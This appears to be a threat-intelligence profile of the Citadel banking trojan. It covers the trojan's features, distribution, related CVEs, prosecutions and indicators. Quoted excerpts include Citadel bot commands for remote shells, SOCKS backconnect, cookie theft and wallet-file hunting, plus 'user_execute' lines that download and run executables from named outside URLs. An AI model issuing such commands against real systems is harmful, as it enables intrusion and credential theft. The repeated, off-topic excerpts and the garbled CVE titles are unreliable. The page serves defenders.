Citadel is a Windows banking trojan derived from the leaked ZeuS codebase and first identified in 2011. It became one of the most prominent ZeuS descendants and was widely used in financially motivated cybercrime operations targeting online banking users, enterprises, and financial institutions. Citadel was associated with large-scale credential theft campaigns and was reported by prosecutors to have infected millions of systems worldwide.
Citadel’s core functionality centers on theft of financial and authentication data. It supports keylogging, browser-focused credential theft, cookie theft, certificate theft, webinjects, form interception, and collection of data from password managers. More advanced variants also implemented screenshot capture, video recording, balance parsing, DNS redirection, and file-search capabilities used to locate and steal high-value files, including cryptocurrency wallet data. Citadel additionally supported remote access and post-compromise operations through SOCKS backconnect, hidden remote desktop or VNC-style access, remote shell capability, file transfer and replacement, and network scanning features.
The malware used modular configuration and command infrastructure, including multiple fallback configuration locations, periodic tasking for updates and log upload, and support for downloading additional modules or executing remote payloads. Some variants included mass-mailing capability and tooling to abuse stolen FTP access for website compromise and malicious content injection. Citadel also incorporated defense-evasion features and options affecting antivirus-removal behavior and execution in virtualized environments.
Distribution was observed through several common crimeware channels. Citadel was delivered via spam and phishing-driven campaigns, exploit-kit activity including Blackhole and RIG, drive-by compromise chains, and alongside other malware families in multi-payload operations. It was also seen distributed in conjunction with Reveton ransomware. The family appeared repeatedly in criminal hosting ecosystems such as Avalanche and bulletproof hosting services used to sustain botnet and malware operations.
Citadel is best understood as a mature banking-trojan platform within the broader ZeuS lineage. Its feature set, widespread criminal adoption, and compatibility with the ZeuS-style webinject ecosystem made it a significant threat to online banking and credential security during its peak years.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
7 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2012-1723 : CVE-2012-1723 Successful Path on SWT
CVE-2010-0188 : CVE-2010-0188 Path fliFiWJM 200 OK (application/pdf)
CVE-2012-4681 : CVE-2012-4681 Path on SWT
<edit2 2013-04-27> Added CVE-2013-2493
CVE-2012-5076 : CVE-2012-5076 in Sweet Orange Part of CVE-2012-5076 in WTPsjof.jar
CVE-2011-3544 : CVE-2011-3544 positive Path
CVE-2012-0507 : CVE-2012-0507 Successful Path on SWT
32 distinct techniques documented for this family, organized by ATT&CK tactic.
the defendants pleaded guilty to conspiring to engage in a Racketeer Influenced Corrupt Organization (RICO) arising from their providing “bulletproof hosting” services between 2008 and 2015, which were used by cybercriminals to distribute malware and attack financial institutions and victims throughout the United States.
clients... used this technical infrastructure to disseminate malware used to gain access to victims’ computers, form botnets, and steal banking credentials for use in frauds.
Iframe lead on a Keitaros TDS who lead on malware: That right, second one is a blackhole exploit kit ... First one is RIG exploit kit delivering Chthonic
These are kits that are stitched into hacked or malicious Web sites, so that all visiting browsers are checked for a variety of insecure, outdated plugins, from Flash to Java to Adobe Reader.
bot_bc_add cmd <ip> <port> [Connect Bot > Backconnect Server > Remote Shell]
Trojans evade detection by having dormant capabilities, hiding components in other files, forming part of a rootkit, or using heavy obfuscation.
bot_bc_remove <service> <ip> <port> [Disconnect from the bot and hide connections from 'netstat' output] ... bot_uninstall [Remove bot file and uninstall it]
clients... used this technical infrastructure to disseminate malware used to gain access to victims’ computers, form botnets, and steal banking credentials for use in frauds.
Emotet version 3 resists investigation: if the Trojan detects that it has been started in a virtual machine it functions as usual but uses a different address list for the command centers... all these addresses are false and are used only to mislead investigators.
Carberp works like many other banking trojans by logging keystrokes, spoofing websites, and hiding instances of itself in specific locations.
file_webinjects "injects.txt" ... url_webinjects "localhost/file.php" ... Feature of 'Web-Injects' section for remote instant inject loading
user_cookies_get [Get IE cookies] ... disable_cookies 0/1 [1- Disable IE/FF cookies-storage upload | 0 - Enable]
entry "NetScan" [hostname "host-to-scan.com" ... ports "1-5000" scantype "2"]
report_software 0/1 [1 - Enable stats collection for Installed Software, Firewall version, Antivirus version | 0 - Disable]
entry "FileSearch" [File search by given mask ... search for exact match ... report on anything found matching this pattern.]
Emotet version 3 resists investigation: if the Trojan detects that it has been started in a virtual machine it functions as usual but uses a different address list for the command centers... all these addresses are false and are used only to mislead investigators.
Q: How to work with File Hunter feature? ... download any file from a bot by BotID ... Auto download - uploads files with a given mask ... It's main purpose is to grab *coin files(multibit.dat/litecoin.dat...)
Carberp works like many other banking trojans by logging keystrokes, spoofing websites, and hiding instances of itself in specific locations.
file_webinjects "injects.txt" ... url_webinjects "localhost/file.php" ... Feature of 'Web-Injects' section for remote instant inject loading
Threat hunters often focus on spotting command-and-control (C2) servers, open directories typically identified by the phrase “Index of” and phishing components.
disable_tcpserver 0/1 [1 - Enable opening SOCKS5 port ...] ... bot_bc_add socks <ip> <port> [Connect Bot > Backconnect Server > Socks5]
user_execute <url> [execute given file] ... user_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe ... user_execute htxp://mareikes.com/wp-includes/pomo/server.exe
the defendants did so by monitoring sites used to blocklist technical infrastructure used for crime, moving “flagged” content to new infrastructure
What made the ’Avalanche’ infrastructure special was the use of the so-called double fast flux technique. The complex setup of the Avalanche network was popular amongst cybercriminals, because of the double fast flux technique offering enhanced resilience to takedowns and law enforcement action.
45 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
36 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Credential-harvesting trojan mentioned as the older malware KINS was developed to replace.
PC banking trojan listed among malware actively used to attack companies.
Named malware/tool listed as detectable via SHA-256 hash in a compilation of attacker infrastructure and malware-related indicators. The content shows Citadel and Zeus with the same hash, suggesting a close relationship or duplicate sample labeling.
Banking trojan malware used to gain access to victims’ computers, form botnets, and steal banking credentials for fraud.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.